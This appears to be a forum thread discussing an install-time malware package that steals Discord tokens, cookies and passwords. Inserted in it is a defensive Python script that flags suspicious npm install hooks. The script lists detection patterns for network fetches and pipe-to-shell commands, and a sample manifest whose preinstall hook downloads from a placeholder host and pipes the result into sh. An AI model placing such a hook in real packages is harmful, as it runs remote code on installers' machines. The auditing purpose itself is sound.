Whoa, that hurts. Seems it is targeting Windows installations, is it not?
Modern web development is absolute bonkers. Just slurp code straight off the internet, what could go wrong? Reminds me of this xkcd: xkcd: Dependency
I’m not sure about the Windows angle. Another post somewhere said that this malware “exfiltrates your Discord tokens, cookies and saved passwords.”
I don’t see any reason that this type of attack couldn’t be carried out with any language (at least those that I am familiar with) and on any platform.
It seems that the malicious payload at some stage runs “pythonw.exe”, which I suspect would fail on macOS. But this is only because the creators targeted Windows installations instead of Unix-based ones. I haven’t really followed the attack description but in macOS it would probably trigger some security dialog due to lack of Full Disk Access permission or something like that so it would be quickly detected.
There is a lesson to be learned, of course, and a dedicated attacker could probably target macOS victims with more subtle techniques. All those “gem install”, “npm install”, “pip install” or, worse, the anti-pattern “bash -c $(curl … )” are not innocent commands. I shudder just thinking what would happen if the popular Homebrew was compromised!
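The point above is that `npm install` (like `pip install` and friends) executes code supplied by the package itself: npm runs the `preinstall`, `install`, `postinstall` and `prepare` lifecycle scripts from a dependency's `package.json` automatically. The following is an added example, not code from the thread or from any project it mentions, of a small pre-install review that reads a `package.json` and reports which install-time hooks exist and which of them contain patterns worth a second look (fetching from the network, piping into a shell, inline interpreter one-liners, decode-and-eval). The two manifests at the bottom are constructed sample inputs; the pattern names and the `audit_package_json`/`is_risky` function names are this example's own choices.

```python
"""Review an npm package.json for scripts that run automatically at install time."""
import json
import re

# npm executes these hooks, in this order, when the package is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns that merit manual review when found in an install hook.
# They are signals for a human reviewer, not a verdict on the package.
SUSPICIOUS = {
    "network_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b|\$\((curl|wget)[^)]*\)"),
    "inline_interpreter": re.compile(r"\b(node|python[w3]?(\.exe)?)\s+-[ce]\b"),
    "decode_exec": re.compile(r"\b(eval|base64)\b"),
}


def audit_package_json(text):
    """Return a list of (hook, command, [matched pattern names]) for every
    install-time hook defined in the manifest. A parse failure is reported
    as a single finding so the caller never silently treats it as clean."""
    try:
        manifest = json.loads(text)
    except json.JSONDecodeError as exc:
        return [("<parse-error>", str(exc), [])]
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
        findings.append((hook, cmd, hits))
    return findings


def is_risky(text):
    """True if any install hook matched at least one pattern, or the file
    could not be parsed (unknown content should not pass review)."""
    return any(hits or hook == "<parse-error>"
               for hook, _cmd, hits in audit_package_json(text))


# Constructed sample manifests (not real packages).
BENIGN = json.dumps({
    "name": "native-addon-sample",
    "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"},
})
SUSPECT = json.dumps({
    "name": "helper-sample",
    "scripts": {"preinstall": "curl -s https://example.invalid/x | sh"},
})

if __name__ == "__main__":
    for label, text in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, "risky" if is_risky(text) else "clean")
        for hook, cmd, hits in audit_package_json(text):
            print(f"  {hook}: {cmd!r} -> {hits or 'no pattern matched'}")
```

In practice this is run against the extracted tarball before installation (for example after `npm pack`, or with `--ignore-scripts` on the first install) so that a flagged hook is read by a person rather than executed. A clean result only means none of these coarse patterns appeared; a hook such as `node-gyp rebuild` still runs arbitrary build code and is reported so the reviewer can decide.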
I’ve only skimmed the article over the first sips of morning coffee, but I don’t think it would take much for the exploit to detect it’s running on a Mac and simply use the normal python executable? I don’t think that running a python script on a Mac automatically opens a window. Also, if this is only going after things that are in your home directory it may not trigger any warnings at all.